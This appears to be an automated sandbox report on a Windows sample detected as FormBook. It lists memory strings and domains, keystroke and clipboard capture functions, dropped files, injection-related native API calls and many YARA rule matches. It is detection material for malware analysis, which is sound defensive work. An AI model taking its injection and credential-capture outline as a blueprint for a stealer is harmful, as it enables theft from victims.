Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.com/tln/www.glowtey.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000005.00000002.476037597.00000000001E8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
Source: explorer.exe, 00000005.00000003.355707285.0000000005940000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00424C58
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043A784 GetKeyboardState, 0_2_0043A784

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\explorer.exe Dropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe Dropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458784 NtdllDefWindowProc_A, 0_2_00458784
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043D6BC NtdllDefWindowProc_A,GetCapture, 0_2_0043D6BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00458F00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00458FB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC GetSubMenu,SaveDC,RestoreDC,731EB080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_0044D1BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419CA0 NtCreateFile, 1_2_00419CA0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419D50 NtReadFile, 1_2_00419D50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419DD0 NtClose, 1_2_00419DD0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419E80 NtAllocateVirtualMemory, 1_2_00419E80
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419C9A NtCreateFile, 1_2_00419C9A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00A398F0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00A39860
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39840 NtDelayExecution,LdrInitializeThunk, 1_2_00A39840
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A399A0 NtCreateSection,LdrInitializeThunk, 1_2_00A399A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00A39910
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A20 NtResumeThread,LdrInitializeThunk, 1_2_00A39A20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00A39A00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A50 NtCreateFile,LdrInitializeThunk, 1_2_00A39A50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A395D0 NtClose,LdrInitializeThunk, 1_2_00A395D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39540 NtReadFile,LdrInitializeThunk, 1_2_00A39540
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00A396E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00A39660
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00A397A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00A39780
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00A39710
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A398A0 NtWriteVirtualMemory, 1_2_00A398A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39820 NtEnumerateKey, 1_2_00A39820
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3B040 NtSuspendThread, 1_2_00A3B040
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A399D0 NtCreateProcessEx, 1_2_00A399D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39950 NtQueueApcThread, 1_2_00A39950
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A80 NtOpenDirectoryObject, 1_2_00A39A80
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A10 NtQuerySection, 1_2_00A39A10
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3A3B0 NtGetContextThread, 1_2_00A3A3B0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39B00 NtSetValueKey, 1_2_00A39B00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A395F0 NtQueryInformationFile, 1_2_00A395F0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39520 NtWaitForSingleObject, 1_2_00A39520
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3AD30 NtSetContextThread, 1_2_00A3AD30
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39560 NtWriteFile, 1_2_00A39560
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A396D0 NtCreateKey, 1_2_00A396D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39610 NtEnumerateValueKey, 1_2_00A39610
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39670 NtQueryInformationProcess, 1_2_00A39670
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39650 NtQueryValueKey, 1_2_00A39650
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39FE0 NtCreateMutant, 1_2_00A39FE0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39730 NtQueryVirtualMemory, 1_2_00A39730
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3A710 NtOpenProcessToken, 1_2_00A3A710
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39760 NtOpenProcess, 1_2_00A39760
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39770 NtSetInformationFile, 1_2_00A39770
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3A770 NtOpenThread, 1_2_00A3A770
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_1_00419CA0 NtCreateFile, 1_1_00419CA0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_1_00419D50 NtReadFile, 1_1_00419D50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_1_00419DD0 NtClose, 1_1_00419DD0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869840 NtDelayExecution,LdrInitializeThunk, 5_2_04869840
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_04869860
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048699A0 NtCreateSection,LdrInitializeThunk, 5_2_048699A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048695D0 NtClose,LdrInitializeThunk, 5_2_048695D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_04869910
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869540 NtReadFile,LdrInitializeThunk, 5_2_04869540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869560 NtWriteFile,LdrInitializeThunk, 5_2_04869560
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048696D0 NtCreateKey,LdrInitializeThunk, 5_2_048696D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_048696E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869610 NtEnumerateValueKey,LdrInitializeThunk, 5_2_04869610
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869650 NtQueryValueKey,LdrInitializeThunk, 5_2_04869650
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A50 NtCreateFile,LdrInitializeThunk, 5_2_04869A50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_04869660
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869780 NtMapViewOfSection,LdrInitializeThunk, 5_2_04869780
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869FE0 NtCreateMutant,LdrInitializeThunk, 5_2_04869FE0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869B00 NtSetValueKey,LdrInitializeThunk, 5_2_04869B00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869710 NtQueryInformationToken,LdrInitializeThunk, 5_2_04869710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869770 NtSetInformationFile,LdrInitializeThunk, 5_2_04869770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048698A0 NtWriteVirtualMemory, 5_2_048698A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048698F0 NtReadVirtualMemory, 5_2_048698F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869820 NtEnumerateKey, 5_2_04869820
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486B040 NtSuspendThread, 5_2_0486B040
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048699D0 NtCreateProcessEx, 5_2_048699D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048695F0 NtQueryInformationFile, 5_2_048695F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869520 NtWaitForSingleObject, 5_2_04869520
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486AD30 NtSetContextThread, 5_2_0486AD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869950 NtQueueApcThread, 5_2_04869950
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A80 NtOpenDirectoryObject, 5_2_04869A80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A00 NtProtectVirtualMemory, 5_2_04869A00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A10 NtQuerySection, 5_2_04869A10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A20 NtResumeThread, 5_2_04869A20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869670 NtQueryInformationProcess, 5_2_04869670
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048697A0 NtUnmapViewOfSection, 5_2_048697A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486A3B0 NtGetContextThread, 5_2_0486A3B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486A710 NtOpenProcessToken, 5_2_0486A710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869730 NtQueryVirtualMemory, 5_2_04869730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869760 NtOpenProcess, 5_2_04869760
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486A770 NtOpenThread, 5_2_0486A770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239CA0 NtCreateFile, 5_2_00239CA0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239D50 NtReadFile, 5_2_00239D50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239DD0 NtClose, 5_2_00239DD0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239E80 NtAllocateVirtualMemory, 5_2_00239E80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239C9A NtCreateFile, 5_2_00239C9A
Detected potential crypto function
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 0_2_0040C340
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00452DE0 0_2_00452DE0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC 0_2_0044D1BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046724C 0_2_0046724C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401026 1_2_00401026
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041DA67 1_2_0041DA67
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041D4F2 1_2_0041D4F2
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4F7 1_2_0041E4F7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4FA 1_2_0041E4FA
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D87 1_2_00402D87
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409E20 1_2_00409E20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041CEE3 1_2_0041CEE3
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E764 1_2_0041E764
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B090 1_2_00A0B090
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1002 1_2_00AB1002
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF900 1_2_009FF900
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2EBB0 1_2_00A2EBB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0841F 1_2_00A0841F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 1_2_00A0D5E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F0D20 1_2_009F0D20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1D55 1_2_00AC1D55
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A16E30 1_2_00A16E30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B090 5_2_0483B090
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F20A8 5_2_048F20A8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F28EC 5_2_048F28EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1002 5_2_048E1002
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483841F 5_2_0483841F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048ED466 5_2_048ED466
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F25DD 5_2_048F25DD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 5_2_0483D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F900 5_2_0482F900
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2D07 5_2_048F2D07
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04820D20 5_2_04820D20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1D55 5_2_048F1D55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F22AE 5_2_048F22AE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2EF7 5_2_048F2EF7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04846E30 5_2_04846E30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485EBB0 5_2_0485EBB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EDBD2 5_2_048EDBD2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1FF1 5_2_048F1FF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2B28 5_2_048F2B28
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4F7 5_2_0023E4F7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4FA 5_2_0023E4FA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D87 5_2_00222D87
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D90 5_2_00222D90
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00229E20 5_2_00229E20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222FB0 5_2_00222FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0482B150 appears 35 times
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 009FB150 appears 32 times
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 00406A94 appears 57 times
PE file contains strange resources
Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: R6o4qCis6s.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe
Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe
Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
Yara signature match
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
